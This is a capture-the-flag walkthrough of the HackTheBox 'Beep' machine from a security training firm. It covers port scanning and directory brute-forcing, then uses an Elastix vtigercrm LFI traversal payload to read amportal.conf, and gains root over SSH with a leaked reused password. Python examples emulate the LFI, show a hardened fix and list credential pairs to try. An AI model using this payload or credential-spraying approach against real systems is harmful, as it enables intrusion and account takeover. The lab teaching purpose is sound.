HackTheBox – Walkthrough of BEEP BOX

Beep runs a very large number of services, which makes it harder to pick the right exploit path. The box may be a little difficult for some because there are several potential attack vectors to sort through.

We will use the following tools to pwn the box from a Kali Linux machine:

  • NMAP
  • Dirbuster
  • Searchsploit
  • Metasploit

Step 1 – Scanning the network

As an initial step, before the machine is exploited, it needs to be scanned and investigated.

This is important to determine what can be exploited afterwards. It is always better to spend time on this phase to extract the maximum amount of information.

Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine which hosts are available on the network, which services those hosts offer, which operating systems they run, which packet filters or firewalls are in use, and many other characteristics.

Use the following command to get a basic idea of what we are scanning:

nmap -sV -sC -A 10.10.10.7

-sV: Probe open ports to determine service/version info

-sC: Default script sets

-A: Aggressive scan. Enables OS detection, version detection, script scanning, and traceroute (so it already implies -sV and -sC; listing them as well is harmless)

10.10.10.7: IP address of the Beep box

We can see that there are 12 open ports:

Port 22. Secure Shell (SSH), secure logins, file transfers (scp, sftp) and port forwarding.

Port 25. Simple Mail Transfer Protocol (SMTP) used for email routing between mail servers.

Port 80. Hypertext Transfer Protocol (HTTP). Here it’s an Apache httpd 2.2.3.

Port 110. Post Office Protocol, version 3 (POP3).

Port 111. Open Network Computing Remote Procedure Call (ONC RPC, sometimes referred to as Sun RPC).

Port 143. Internet Message Access Protocol (IMAP), management of electronic mail messages on a server.

Port 443. Hypertext Transfer Protocol over TLS/SSL (HTTPS).

Port 993. Internet Message Access Protocol over TLS/SSL (IMAPS).

Port 995. Post Office Protocol 3 over TLS/SSL (POP3S).

Port 3306. MySQL database system.

Port 4445. I2P HTTP/S proxy.

Port 10000. Webmin, Web-based Unix/Linux system administration tool (default port).

Nmap finds quite a long list of services. The target will be the Apache web server on port 80, which redirects to the HTTPS interface on port 443.
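As an added example (not part of the original walkthrough and not Nmap's own code), the script below reads the XML that Nmap writes with -oX and produces the kind of port table listed above, plus the web URLs worth handing to DirBuster. The XML is a constructed, trimmed sample in Nmap's format built from a few of the ports found here, not a capture from the box; the output file name beep.xml is an assumption.

```python
"""Turn Nmap's XML output into a port table and a list of web targets.

Added example for this walkthrough, not code from the page or from Nmap.
Run the scan with -oX to get XML (nmap -sV -sC -A -oX beep.xml 10.10.10.7);
SAMPLE_XML below is a constructed, trimmed document in that shape.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List

# Constructed sample, not a capture: a few of the ports the scan reports.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -sC -A -oX beep.xml 10.10.10.7">
  <host><status state="up"/>
    <address addr="10.10.10.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="25"><state state="open"/><service name="smtp"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.2.3"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="http" product="Apache httpd" version="2.2.3" tunnel="ssl"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/></port>
      <port protocol="tcp" portid="4445"><state state="filtered"/></port>
      <port protocol="tcp" portid="10000"><state state="open"/><service name="http" product="MiniServ" extrainfo="Webmin httpd"/></port>
    </ports>
  </host>
</nmaprun>
"""


@dataclass(frozen=True)
class PortInfo:
    host: str
    port: int
    proto: str
    service: str
    product: str
    version: str
    tls: bool


def parse_nmap_xml(xml_text: str, state: str = "open") -> List[PortInfo]:
    """Every port in the requested state, with whatever -sV identified."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            st = port.find("state")
            if st is None or st.get("state") != state:
                continue
            svc = port.find("service")
            a = svc.attrib if svc is not None else {}
            product = " ".join(x for x in (a.get("product", ""), a.get("extrainfo", "")) if x)
            rows.append(PortInfo(addr, int(port.get("portid")), port.get("protocol"),
                                 a.get("name", ""), product, a.get("version", ""),
                                 a.get("tunnel") == "ssl"))
    return sorted(rows, key=lambda r: (r.host, r.proto, r.port))


def web_targets(rows: List[PortInfo]) -> List[str]:
    """URLs to feed to DirBuster: anything Nmap called http, with the right scheme."""
    return [f"{'https' if r.tls else 'http'}://{r.host}:{r.port}/"
            for r in rows if r.service == "http"]


def format_table(rows: List[PortInfo]) -> str:
    """Plain-text table in port order, like the list in the walkthrough."""
    lines = [f"{'PORT':<11}{'SERVICE':<9}{'TLS':<5}VERSION"]
    for r in rows:
        pp = f"{r.port}/{r.proto}"
        ver = " ".join(x for x in (r.product, r.version) if x)
        lines.append(f"{pp:<11}{r.service:<9}{'yes' if r.tls else 'no':<5}{ver}")
    return "\n".join(lines)


if __name__ == "__main__":
    open_ports = parse_nmap_xml(SAMPLE_XML)
    print(format_table(open_ports))
    print("web targets:", ", ".join(web_targets(open_ports)))
```

Filtering on the state attribute matters: Nmap also records filtered and closed ports in the XML, and a brute-force list built from all of them wastes time on ports that never answered.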

Step 2 – Enumeration of Directories.

I now use DirBuster, a multi-threaded Java application designed to brute force directory and file names on web/application servers.

You can launch DirBuster by typing this command in the terminal:

dirbuster

Specify the target URL as http://10.10.10.7:80/ in the application.

I use the directory-list-2.3-medium.txt wordlist for this search.

DirBuster finds a huge list of directories belonging to several content management systems and open source applications. Several of them have known vulnerabilities that can lead to a shell.

Step 3 – Visiting the URL.

Let’s try port 80 and visit http://10.10.10.7

The site redirects to HTTPS with a certificate the browser does not trust; after adding a security exception we can visit the address, and the Elastix login portal opens. Elastix is a unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a web interface and includes capabilities such as call center software with predictive dialing.

An IP PBX (“Internet Protocol private branch exchange”) is a system that connects telephone extensions to the public switched telephone network (PSTN) and provides internal communication for a business.

Searchsploit, the command-line front end to the Exploit-DB archive, is used to look up known vulnerabilities in Elastix.

The following command prints the exploit it turns up (on Kali the archive lives under /usr/share/exploitdb):

cat /usr/share/exploitdb/exploits/php/webapps/37937.pl

The LFI request used by the exploit is:

/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Local File Inclusion (LFI) tricks the web application into exposing or running files on the web server. Here the current_language parameter is spliced into an include path: the ../ sequences walk up out of the web root to /etc/amportal.conf, and the %00 null byte truncates the file-name suffix the script appends. That truncation works here because the box runs a PHP build older than 5.3.4, where a null byte still terminates a file path. Depending on what can be included, LFI leads to information disclosure, remote code execution, or even cross-site scripting (XSS).

Step 4 – Trying the Elastix LFI exploit

Let’s navigate to the exploit URL in the browser.

The included file is rendered inside the page, so we view the page source to read its contents properly.

The file contains several usernames and passwords, and we try to SSH into the box using one of them.

None of the other usernames work, so we try root over SSH with the following command:

ssh root@10.10.10.7

Try the password jEhdIekWmdjE and... yep, we have an SSH session as root. That password is one of the application passwords stored in amportal.conf, reused for the system root account. One caveat: Beep runs an old OpenSSH build, so a current client may refuse its legacy key-exchange and host-key algorithms and needs them enabled explicitly through the KexAlgorithms and HostKeyAlgorithms options.
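Putting steps 3 and 4 together as an added example (not code from the walkthrough, from Elastix or from the Exploit-DB script): the Python below emulates the vulnerable PHP include against an in-memory fake filesystem to show why the null-byte payload reaches /etc/amportal.conf and what a safe version of the same include looks like, then parses the leaked file for credentials and lists the SSH logins to try. The install path, the fake filesystem and the amportal.conf contents are constructed assumptions; only the password is the one reported on this page.

```python
"""graph.php LFI: why the payload works, the fix, and what to pull out of the file.

Added example for this walkthrough, not code from the page, from Elastix or
from the Exploit-DB script. The PHP include is emulated in Python against an
in-memory fake filesystem so everything runs offline.
"""
import posixpath
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

WEBROOT = "/var/www/html/vtigercrm"   # assumed install path, not verified on the box
FAKE_FS = {                           # constructed stand-in for the target's files
    f"{WEBROOT}/modules/Accounts/language/en_us.lang.php": "<?php /* language strings */ ?>",
    "/etc/amportal.conf": (
        "# constructed sample in the shape of FreePBX's amportal.conf\n"
        "AMPDBHOST=localhost\n"
        "AMPDBENGINE=mysql\n"
        "AMPDBUSER=asteriskuser\n"
        "AMPDBPASS=jEhdIekWmdjE\n"
        "AMPMGRUSER=admin\n"
        "AMPMGRPASS=jEhdIekWmdjE\n"
        "ARI_ADMIN_USERNAME=admin\n"
        "ARI_ADMIN_PASSWORD=jEhdIekWmdjE\n"
    ),
}
LFI_URL = ("https://10.10.10.7/vtigercrm/graph.php?current_language="
           "../../../../../../../..//etc/amportal.conf%00&module=Accounts&action")


def _read(path: str) -> Optional[str]:
    return FAKE_FS.get(posixpath.normpath(path))


def vulnerable_include(current_language: str, module: str = "Accounts") -> Optional[str]:
    """Pre-fix pattern: include("modules/$module/language/$current_language.lang.php").
    The ../ sequences walk out of the web root; on PHP < 5.3.4 the underlying
    open() stops at the first NUL byte, so %00 discards the ".lang.php" suffix."""
    path = f"{WEBROOT}/modules/{module}/language/{current_language}.lang.php"
    path = path.split("\x00", 1)[0]          # null-byte truncation
    return _read(path)


def hardened_include(current_language: str, module: str = "Accounts") -> str:
    """Fixed pattern: accept only a bare language tag and module name, never a path."""
    if not re.fullmatch(r"[a-z]{2}_[a-z]{2}", current_language):
        raise ValueError(f"rejected language value {current_language!r}")
    if not re.fullmatch(r"[A-Za-z]+", module):
        raise ValueError(f"rejected module value {module!r}")
    content = _read(f"{WEBROOT}/modules/{module}/language/{current_language}.lang.php")
    if content is None:
        raise FileNotFoundError(current_language)
    return content


def fetch_via_lfi(url: str) -> Optional[str]:
    """What the server does with the exploit URL; parse_qs decodes %00 to a NUL byte."""
    params = parse_qs(urlsplit(url).query)
    lang = params["current_language"][0]
    module = params.get("module", ["Accounts"])[0]
    return vulnerable_include(lang, module)


def parse_amportal(text: str) -> Dict[str, str]:
    """KEY=VALUE lines, ignoring comments and blanks."""
    conf: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def extract_secrets(conf: Dict[str, str]) -> Dict[str, str]:
    """Keys that look like credentials; one value repeated across them is the tell."""
    return {k: v for k, v in conf.items() if re.search(r"PASS|PASSWORD|SECRET", k)}


def ssh_candidates(conf: Dict[str, str]) -> List[Tuple[str, str]]:
    """(user, password) pairs to try: every user named in the file, plus root."""
    users = {"root"} | {v for k, v in conf.items() if re.search(r"USER(NAME)?$", k)}
    passwords = set(extract_secrets(conf).values())
    return sorted((u, p) for u in users for p in passwords)


if __name__ == "__main__":
    leaked = fetch_via_lfi(LFI_URL)
    print(leaked)
    for user, password in ssh_candidates(parse_amportal(leaked)):
        print(f"try: ssh {user}@10.10.10.7  (password {password})")
```

The hardened version never builds a path from the raw parameter; it matches the value against the shape a language tag must have and lets the filesystem answer only for files that exist under the expected directory.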

Step 5 – Looking for the root.txt flag

The following command shows our location on the machine:

pwd

We are in /root, the root user's home directory. Listing it with

ls

shows the root.txt file.

To read the contents of the file:

cat root.txt

Step 6 – Looking for the user.txt flag

Now look for the user.txt flag.

Change to the home directory:

cd /home

We find user.txt in the home directory of the user fanis, /home/fanis. Read it with cat (type is the Windows equivalent and does not exist on this box):

cat /home/fanis/user.txt

Congrats! We found both flags! 😀

About Cybervie

Cybervie provides a cyber security training program in Hyderabad, India. This cyber security course enables you to detect vulnerabilities in a system, ward off attacks and manage emergency situations. Taking a proactive approach to security that helps organisations protect their data, Cybervie has designed its training module around cyber security industry requirements, with three levels of training in both offensive and defensive manner, using real-time scenarios that help students understand the market up to its standard certification, an added advantage that lets our students stand out in a cyber security interview.
